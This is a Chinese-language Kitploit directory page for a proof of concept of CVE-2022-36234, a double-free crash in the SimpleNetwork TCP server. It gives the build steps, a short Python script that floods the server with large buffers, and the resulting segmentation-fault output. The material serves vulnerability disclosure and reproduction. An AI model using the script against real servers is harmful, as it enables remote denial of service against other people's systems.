Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-36234 — CVE-2022-36234 的概念验证 | Kitploit
工具/GitHubGitHub/halcy0nic/cve-2022-36234
漏洞分析漏洞利用模糊测试渗透测试学习与教育二进制利用
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

CVE-2022-36234 的概念验证

查看仓库
213年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-36234 描述

SimpleNetwork TCP Server 的 commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 被发现包含一个双重释放漏洞,可通过精心构造的 TCP 数据包加以利用。触发该双重释放漏洞可使客户端远程崩溃任何 SimpleNetwork TCP 服务器。在其他情况下,双重释放漏洞可能导致未定义行为,并在适当条件下可能执行代码。

复现

为确保你拥有编译该库所需的标准构建工具,请安装以下软件包(在大多数系统上这些工具通常已安装):

root@kitploit:~
sudo apt-get install build-essential git

该漏洞可以通过向服务器发送连续的请求来复现,这些请求在 TCP 数据包中包含一个大的字符缓冲区。首先,编译源代码中提供的 'libSimpleNetwork' 库和示例服务器:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

启动示例服务器:

root@kitploit:~
./server 80 1

将以下 python3 概念验证脚本保存到文件中(根据需要修改主机):

root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

执行 python3 脚本:

root@kitploit:~
python3 poc.py

崩溃验证:

如果成功,服务器将崩溃,你将看到来自应用程序的以下输出:

root@kitploit:~
segmentation fault  ./server 80 1

参考

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234
下载工具